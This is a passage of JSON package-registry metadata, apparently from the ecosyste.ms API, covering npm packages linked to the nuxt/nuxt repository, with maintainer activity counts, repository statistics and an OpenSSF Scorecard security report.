uthors_count":605,"past_year_avg_comments_per_issue":2.2386634844868736,"past_year_avg_comments_per_pull_request":3.3209876543209877,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":551,"past_year_merged_pull_requests_count":932,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":59,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"Mini-ghost","count":42,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"cernymatej","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"BobbieGoede","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"DamianGlowala","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"atinux","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"userquin","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"wattanx","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"productdevbook","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"antfu","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"HugoRCD","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"Hebilicious","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@lgcardenas%2Fbuilder/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@lgcardenas%2Fbuilder/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@lgcardenas%2Fbuilder/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@lgcardenas%2Fbuilder/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@lgcardenas%2Fbuilder/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@lgcardenas%2Fbuilder/codemeta","maintainers":[{"uuid":"lgcardenas","login":"lgcardenas","name":null,"email":"lgcardenas910526@gmail.com","url":null,"packages_count":2,"html_url":"https://www.npmjs.com/~lgcardenas","role":null,"created_at":"2025-01-09T14:36:29.788Z","updated_at":"2025-01-09T14:36:29.788Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/lgcardenas/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":11342488,"name":"@rsnuxt/utils","ecosystem":"npm","description":null,"homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"rsnuxt","versions_count":14,"first_release_published_at":"2025-02-11T09:14:52.942Z","latest_release_published_at":"2025-09-08T05:31:54.115Z","latest_release_number":"0.5.8","last_synced_at":"2026-05-11T01:23:06.193Z","created_at":"2025-02-11T09:15:17.401Z","updated_at":"2026-05-11T01:23:06.193Z","registry_url":"https://www.npmjs.com/package/@rsnuxt/utils","install_command":"npm install @rsnuxt/utils","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"0.2.2-alpha.1":"0.2.2-alpha.1","latest":"0.5.8"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-04-24T15:11:02.000Z","size":136837,"stargazers_count":60120,"open_issues_count":949,"forks_count":5591,"subscribers_count":777,"default_branch":"main","last_synced_at":"2026-04-24T20:04:41.708Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-04-24T18:27:37.000Z","dependencies_parsed_at":"2026-03-18T13:06:30.670Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":317,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32304464,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-26T09:34:17.070Z","status":"ssl_error","status_checked_at":"2026-04-26T09:34:00.993Z","response_time":129,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"tags":[]},"repo_metadata_updated_at":"2026-05-11T01:23:04.007Z","dependent_packages_count":0,"downloads":882,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":25.063441759567027,"dependent_packages_count":36.25204172285812,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":30.657741741212572},"purl":"pkg:npm/%40rsnuxt/utils","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@rsnuxt/utils","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@rsnuxt/utils","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@rsnuxt/utils/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-08T05:00:23.926Z","issues_count":6007,"pull_requests_count":6866,"avg_time_to_close_issue":11690528.2843204,"avg_time_to_close_pull_request":786911.0872727273,"issues_closed_count":4402,"pull_requests_closed_count":6050,"pull_request_authors_count":589,"issue_authors_count":3402,"avg_comments_per_issue":4.151489928416847,"avg_comments_per_pull_request":2.4957762889600934,"merged_pull_requests_count":5385,"bot_issues_count":12,"bot_pull_requests_count":2971,"past_year_issues_count":838,"past_year_pull_requests_count":1377,"past_year_avg_time_to_close_issue":720221.4700665189,"past_year_avg_time_to_close_pull_request":229718.65300285988,"past_year_issues_closed_count":451,"past_year_pull_requests_closed_count":1049,"past_year_pull_request_authors_count":127,"past_year_issue_authors_count":605,"past_year_avg_comments_per_issue":2.2386634844868736,"past_year_avg_comments_per_pull_request":3.3209876543209877,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":551,"past_year_merged_pull_requests_count":932,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":59,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"Mini-ghost","count":42,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"cernymatej","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"BobbieGoede","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"DamianGlowala","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"atinux","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"userquin","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"wattanx","count":4,"url":"https://issues.ecosyste.ms